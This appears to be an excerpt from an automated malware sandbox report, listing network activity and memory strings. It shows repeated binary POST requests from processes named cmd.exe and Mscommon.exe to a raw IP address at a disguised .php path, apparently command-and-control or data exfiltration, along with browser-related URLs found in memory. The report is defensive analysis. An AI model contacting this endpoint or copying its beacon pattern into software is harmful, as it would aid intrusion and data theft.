                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownTCP traffic detected without corresponding DNS query: 193.58.121.137
                                    Source: unknownHTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.58.121.137
                                    Source: cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Gam
                                    Source: cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.58.H
                                    Source: cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.58.H:
                                    Source: cmd.exe, 0000002D.00000002.2713123527.00000000009D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                                    Source: Mscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                    Source: cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: xu1yHoHXYs.33.drString found in binary or memory: https://support.mozilla.org
                                    Source: xu1yHoHXYs.33.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                    Source: xu1yHoHXYs.33.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                    Source: cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                    Source: cmd.exe, 00000021.00000002.2960240570.0000000013934000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
